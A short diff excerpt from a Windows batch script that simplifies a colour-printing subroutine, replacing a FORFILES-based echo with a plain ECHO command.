 SET "PercentageTrack=0"
 EXIT /B
 
@@ -658,5 +720,5 @@ EXIT /B
 
 :ColorLine
 SET "CurrentLine=%~1"
-FOR /F "delims=" %%A IN ('FORFILES.EXE /P %~dp0 /M %~nx0 /C "CMD /C ECHO.!CurrentLine!"') DO ECHO.%%A
+ECHO.!CurrentLine!
 EXIT /B